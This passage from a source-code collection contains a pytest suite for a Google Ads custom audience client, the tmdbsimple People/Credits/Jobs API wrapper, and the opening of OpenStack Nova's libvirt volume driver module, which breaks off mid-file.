grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_custom_audience_service_client_client_options_from_dict():
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_get_custom_audience(transport: str = 'grpc', request_type=custom_audience_service.GetCustomAudienceRequest):
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_custom_audience),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience.CustomAudience(
resource_name='resource_name_value',
id=205,
status=custom_audience_status.CustomAudienceStatusEnum.CustomAudienceStatus.UNKNOWN,
name='name_value',
type_=custom_audience_type.CustomAudienceTypeEnum.CustomAudienceType.UNKNOWN,
description='description_value',
)
response = client.get_custom_audience(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == custom_audience_service.GetCustomAudienceRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, custom_audience.CustomAudience)
assert response.resource_name == 'resource_name_value'
assert response.id == 205
assert response.status == custom_audience_status.CustomAudienceStatusEnum.CustomAudienceStatus.UNKNOWN
assert response.name == 'name_value'
assert response.type_ == custom_audience_type.CustomAudienceTypeEnum.CustomAudienceType.UNKNOWN
assert response.description == 'description_value'
def test_get_custom_audience_from_dict():
test_get_custom_audience(request_type=dict)
def test_get_custom_audience_field_headers():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = custom_audience_service.GetCustomAudienceRequest()
request.resource_name = 'resource_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_custom_audience),
'__call__') as call:
call.return_value = custom_audience.CustomAudience()
client.get_custom_audience(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'resource_name=resource_name/value',
) in kw['metadata']
def test_get_custom_audience_flattened():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_custom_audience),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience.CustomAudience()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_custom_audience(
resource_name='resource_name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource_name == 'resource_name_value'
def test_get_custom_audience_flattened_error():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_custom_audience(
custom_audience_service.GetCustomAudienceRequest(),
resource_name='resource_name_value',
)
def test_mutate_custom_audiences(transport: str = 'grpc', request_type=custom_audience_service.MutateCustomAudiencesRequest):
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_custom_audiences),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience_service.MutateCustomAudiencesResponse(
)
response = client.mutate_custom_audiences(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == custom_audience_service.MutateCustomAudiencesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, custom_audience_service.MutateCustomAudiencesResponse)
def test_mutate_custom_audiences_from_dict():
test_mutate_custom_audiences(request_type=dict)
def test_mutate_custom_audiences_field_headers():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = custom_audience_service.MutateCustomAudiencesRequest()
request.customer_id = 'customer_id/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_custom_audiences),
'__call__') as call:
call.return_value = custom_audience_service.MutateCustomAudiencesResponse()
client.mutate_custom_audiences(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'customer_id=customer_id/value',
) in kw['metadata']
def test_mutate_custom_audiences_flattened():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_custom_audiences),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience_service.MutateCustomAudiencesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.mutate_custom_audiences(
customer_id='customer_id_value',
operations=[custom_audience_service.CustomAudienceOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].customer_id == 'customer_id_value'
assert args[0].operations == [custom_audience_service.CustomAudienceOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))]
def test_mutate_custom_audiences_flattened_error():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.mutate_custom_audiences(
custom_audience_service.MutateCustomAudiencesRequest(),
customer_id='customer_id_value',
operations=[custom_audience_service.CustomAudienceOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = CustomAudienceServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.CustomAudienceServiceGrpcTransport,
)
@pytest.mark.parametrize("transport_class", [
transports.CustomAudienceServiceGrpcTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_custom_audience_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.CustomAudienceServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'get_custom_audience',
'mutate_custom_audiences',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
def test_custom_audience_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default') as adc, mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.CustomAudienceServiceTransport()
adc.assert_called_once()
def test_custom_audience_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
CustomAudienceServiceClient()
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_custom_audience_service_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transports.CustomAudienceServiceGrpcTransport(host="squid.clam.whelk")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_custom_audience_service_host_no_port():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com'),
)
assert client.transport._host == 'googleads.googleapis.com:443'
def test_custom_audience_service_host_with_port():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com:8000'),
)
assert client.transport._host == 'googleads.googleapis.com:8000'
def test_custom_audience_service_grpc_transport_channel():
channel = grpc.insecure_channel('http://localhost/')
# Check that channel is used if provided.
transport = transports.CustomAudienceServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
@pytest.mark.parametrize("transport_class", [transports.CustomAudienceServiceGrpcTransport])
def test_custom_audience_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
@pytest.mark.parametrize("transport_class", [transports.CustomAudienceServiceGrpcTransport,])
def test_custom_audience_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_custom_audience_path():
customer_id = "squid"
custom_audience_id = "clam"
expected = "customers/{customer_id}/customAudiences/{custom_audience_id}".format(customer_id=customer_id, custom_audience_id=custom_audience_id, )
actual = CustomAudienceServiceClient.custom_audience_path(customer_id, custom_audience_id)
assert expected == actual
def test_parse_custom_audience_path():
expected = {
"customer_id": "whelk",
"custom_audience_id": "octopus",
}
path = CustomAudienceServiceClient.custom_audience_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_custom_audience_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "oyster"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = CustomAudienceServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nudibranch",
}
path = CustomAudienceServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "cuttlefish"
expected = "folders/{folder}".format(folder=folder, )
actual = CustomAudienceServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "mussel",
}
path = CustomAudienceServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "winkle"
expected = "organizations/{organization}".format(organization=organization, )
actual = CustomAudienceServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nautilus",
}
path = CustomAudienceServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "scallop"
expected = "projects/{project}".format(project=project, )
actual = CustomAudienceServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "abalone",
}
path = CustomAudienceServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "squid"
location = "clam"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = CustomAudienceServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "whelk",
"location": "octopus",
}
path = CustomAudienceServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.CustomAudienceServiceTransport, '_prep_wrapped_messages') as prep:
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.CustomAudienceServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = CustomAudienceServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| apache-2.0 | -7,432,984,637,234,446,000 | 42.836025 | 217 | 0.682555 | false | 4.066375 | true | false | false |
coronary/RandomEpisode | depends/Lib/site-packages/tmdbsimple/people.py | 1 | 7235 | # -*- coding: utf-8 -*-
"""
tmdbsimple.people
~~~~~~~~~~~~~~~~~
This module implements the People, Credits, and Jobs functionality
of tmdbsimple.
Created by Celia Oakley on 2013-10-31.
:copyright: (c) 2013-2017 by Celia Oakley
:license: GPLv3, see LICENSE for more details
"""
from .base import TMDB
class People(TMDB):
"""
People functionality.
See: http://docs.themoviedb.apiary.io/#people
"""
BASE_PATH = 'person'
URLS = {
'info': '/{id}',
'movie_credits': '/{id}/movie_credits',
'tv_credits': '/{id}/tv_credits',
'combined_credits': '/{id}/combined_credits',
'external_ids': '/{id}/external_ids',
'images': '/{id}/images',
'changes': '/{id}/changes',
'popular': '/popular',
'latest': '/latest',
}
def __init__(self, id=0):
super(People, self).__init__()
self.id = id
def info(self, **kwargs):
"""
Get the general person information for a specific id.
Args:
append_to_response: (optional) Comma separated, any person method.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def movie_credits(self, **kwargs):
"""
Get the movie credits for a specific person id.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Comma separated, any person method.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('movie_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def tv_credits(self, **kwargs):
"""
Get the TV credits for a specific person id.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Comma separated, any person method.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('tv_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def combined_credits(self, **kwargs):
"""
Get the combined (movie and TV) credits for a specific person id.
To get the expanded details for each TV record, call the /credit method
with the provided credit_id. This will provide details about which
episode and/or season the credit is for.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Comma separated, any person method.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('combined_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def external_ids(self, **kwargs):
"""
Get the external ids for a specific person id.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('external_ids')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def images(self, **kwargs):
"""
Get the images for a specific person id.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('images')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def changes(self, **kwargs):
"""
Get the changes for a specific person id.
Changes are grouped by key, and ordered by date in descending order.
By default, only the last 24 hours of changes are returned. The maximum
number of days that can be returned in a single request is 14. The
language is present on fields that are translatable.
Args:
start_date: (optional) Expected format is 'YYYY-MM-DD'.
end_date: (optional) Expected format is 'YYYY-MM-DD'.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_id_path('changes')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def popular(self, **kwargs):
"""
Get the list of popular people on The Movie Database. This list
refreshes every day.
Args:
page: (optional) Minimum 1, maximum 1000.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_path('popular')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def latest(self, **kwargs):
"""
Get the latest person id.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_path('latest')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
class Credits(TMDB):
"""
Credits functionality.
See: http://docs.themoviedb.apiary.io/#credits
"""
BASE_PATH = 'credit'
URLS = {
'info': '/{credit_id}',
}
def __init__(self, credit_id):
super(Credits, self).__init__()
self.credit_id = credit_id
def info(self, **kwargs):
"""
Get the detailed information about a particular credit record. This is
currently only supported with the new credit model found in TV. These
ids can be found from any TV credit response as well as the tv_credits
and combined_credits methods for people.
The episodes object returns a list of episodes and are generally going
to be guest stars. The season array will return a list of season
numbers. Season credits are credits that were marked with the
"add to every season" option in the editing interface and are
assumed to be "season regulars".
Args:
language: (optional) ISO 639-1 code.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_credit_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
class Jobs(TMDB):
"""
Jobs functionality.
See: http://docs.themoviedb.apiary.io/#jobs
"""
BASE_PATH = 'job'
URLS = {
'list': '/list',
}
def list(self, **kwargs):
"""
Get a list of valid jobs.
Returns:
A dict respresentation of the JSON returned from the API.
"""
path = self._get_path('list')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
| mit | 481,468,421,621,754,600 | 27.710317 | 80 | 0.581617 | false | 4.170029 | false | false | false |
ruslanloman/nova | nova/virt/libvirt/volume/volume.py | 1 | 16814 | # Copyright 2011 OpenStack Foundation
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Volume drivers for libvirt."""
import os
from os_brick.initiator import connector
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
import six
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LW
from nova import paths
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import utils as libvirt_utils
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help='Number of times to rescan iSCSI target to find volume'),
cfg.IntOpt('num_iser_scan_tries',
default=5,
help='Number of times to rescan iSER target to find volume'),
cfg.StrOpt('rbd_user',
help='The RADOS client name for accessing rbd volumes'),
cfg.StrOpt('rbd_secret_uuid',
help='The libvirt UUID of the secret for the rbd_user'
'volumes'),
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help='Directory where the NFS volume is mounted on the'
' compute node'),
cfg.StrOpt('nfs_mount_options',
help='Mount options passed to the NFS client. See section '
'of the nfs man page for details'),
cfg.BoolOpt('iscsi_use_multipath',
default=False,
help='Use multipath connection of the iSCSI volume'),
cfg.BoolOpt('iser_use_multipath',
default=False,
help='Use multipath connection of the iSER volume'),
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help='Protocols listed here will be accessed directly '
'from QEMU. Currently supported protocols: [gluster]'),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help='The iSCSI transport iface to use to connect to target in '
'case offload support is desired. Default format is of '
'the form <transport_name>.<hwaddress> where '
'<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, '
'cxgb4i, qla4xxx, ocs) and <hwadress> is the MAC address '
'of the interface and can be generated via the '
'iscsiadm -m iface command. Do not confuse the '
'iscsi_iface parameter to be provided here with the '
'actual transport name.'),
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
CONF = cfg.CONF
CONF.register_opts(volume_opts, 'libvirt')
class LibvirtBaseVolumeDriver(object):
"""Base class for volume drivers."""
def __init__(self, connection, is_block_dev):
self.connection = connection
self.is_block_dev = is_block_dev
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = vconfig.LibvirtConfigGuestDisk()
conf.driver_name = libvirt_utils.pick_disk_driver_name(
self.connection._host.get_version(),
self.is_block_dev
)
conf.source_device = disk_info['type']
conf.driver_format = "raw"
conf.driver_cache = "none"
conf.target_dev = disk_info['dev']
conf.target_bus = disk_info['bus']
conf.serial = connection_info.get('serial')
# Support for block size tuning
data = {}
if 'data' in connection_info:
data = connection_info['data']
if 'logical_block_size' in data:
conf.logical_block_size = data['logical_block_size']
if 'physical_block_size' in data:
conf.physical_block_size = data['physical_block_size']
# Extract rate_limit control parameters
if 'qos_specs' in data and data['qos_specs']:
tune_opts = ['total_bytes_sec', 'read_bytes_sec',
'write_bytes_sec', 'total_iops_sec',
'read_iops_sec', 'write_iops_sec']
specs = data['qos_specs']
if isinstance(specs, dict):
for k, v in six.iteritems(specs):
if k in tune_opts:
new_key = 'disk_' + k
setattr(conf, new_key, v)
else:
LOG.warn(_LW('Unknown content in connection_info/'
'qos_specs: %s'), specs)
# Extract access_mode control parameters
if 'access_mode' in data and data['access_mode']:
access_mode = data['access_mode']
if access_mode in ('ro', 'rw'):
conf.readonly = access_mode == 'ro'
else:
LOG.error(_LE('Unknown content in '
'connection_info/access_mode: %s'),
access_mode)
raise exception.InvalidVolumeAccessMode(
access_mode=access_mode)
return conf
def _get_secret_uuid(self, conf, password=None):
secret = self.connection._host.find_secret(conf.source_protocol,
conf.source_name)
if secret is None:
secret = self.connection._host.create_secret(conf.source_protocol,
conf.source_name,
password)
return secret.UUIDString()
def _delete_secret_by_name(self, connection_info):
source_protocol = connection_info['driver_volume_type']
netdisk_properties = connection_info['data']
if source_protocol == 'rbd':
return
elif source_protocol == 'iscsi':
usage_type = 'iscsi'
usage_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
self.connection._host.delete_secret(usage_type, usage_name)
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
pass
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
pass
class LibvirtVolumeDriver(LibvirtBaseVolumeDriver):
"""Class for volumes backed by local file."""
def __init__(self, connection):
super(LibvirtVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
class LibvirtFakeVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach fake volumes to libvirt."""
def __init__(self, connection):
super(LibvirtFakeVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtFakeVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "network"
conf.source_protocol = "fake"
conf.source_name = "fake"
return conf
class LibvirtNetVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtNetVolumeDriver,
self).__init__(connection, is_block_dev=False)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNetVolumeDriver,
self).get_config(connection_info, disk_info)
netdisk_properties = connection_info['data']
conf.source_type = "network"
conf.source_protocol = connection_info['driver_volume_type']
conf.source_name = netdisk_properties.get('name')
conf.source_hosts = netdisk_properties.get('hosts', [])
conf.source_ports = netdisk_properties.get('ports', [])
auth_enabled = netdisk_properties.get('auth_enabled')
if (conf.source_protocol == 'rbd' and
CONF.libvirt.rbd_secret_uuid):
conf.auth_secret_uuid = CONF.libvirt.rbd_secret_uuid
auth_enabled = True # Force authentication locally
if CONF.libvirt.rbd_user:
conf.auth_username = CONF.libvirt.rbd_user
if conf.source_protocol == 'iscsi':
try:
conf.source_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
target_portal = netdisk_properties['target_portal']
except KeyError:
raise exception.NovaException(_("Invalid volume source data"))
ip, port = utils.parse_server_string(target_portal)
if ip == '' or port == '':
raise exception.NovaException(_("Invalid target_lun"))
conf.source_hosts = [ip]
conf.source_ports = [port]
if netdisk_properties.get('auth_method') == 'CHAP':
auth_enabled = True
conf.auth_secret_type = 'iscsi'
password = netdisk_properties.get('auth_password')
conf.auth_secret_uuid = self._get_secret_uuid(conf, password)
if auth_enabled:
conf.auth_username = (conf.auth_username or
netdisk_properties['auth_username'])
conf.auth_secret_type = (conf.auth_secret_type or
netdisk_properties['secret_type'])
conf.auth_secret_uuid = (conf.auth_secret_uuid or
netdisk_properties['secret_uuid'])
return conf
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
super(LibvirtNetVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
self._delete_secret_by_name(connection_info)
class LibvirtISCSIVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISCSIVolumeDriver, self).__init__(connection,
is_block_dev=True)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISCSI', utils._get_root_helper(),
use_multipath=CONF.libvirt.iscsi_use_multipath,
device_scan_attempts=CONF.libvirt.num_iscsi_scan_tries,
transport=self._get_transport())
def _get_transport(self):
if CONF.libvirt.iscsi_iface:
transport = CONF.libvirt.iscsi_iface
else:
transport = 'default'
return transport
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtISCSIVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
def connect_volume(self, connection_info, disk_info):
"""Attach the volume to instance_name."""
LOG.debug("Calling os-brick to attach iSCSI Volume")
device_info = self.connector.connect_volume(connection_info['data'])
LOG.debug("Attached iSCSI volume %s", device_info)
connection_info['data']['device_path'] = device_info['path']
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
LOG.debug("calling os-brick to detach iSCSI Volume")
self.connector.disconnect_volume(connection_info['data'], None)
LOG.debug("Disconnected iSCSI Volume %s", disk_dev)
super(LibvirtISCSIVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
class LibvirtISERVolumeDriver(LibvirtISCSIVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISERVolumeDriver, self).__init__(connection)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISER', utils._get_root_helper(),
use_multipath=CONF.libvirt.iser_use_multipath,
device_scan_attempts=CONF.libvirt.num_iser_scan_tries,
transport=self._get_transport())
def _get_transport(self):
return 'iser'
class LibvirtNFSVolumeDriver(LibvirtBaseVolumeDriver):
"""Class implements libvirt part of volume driver for NFS."""
def __init__(self, connection):
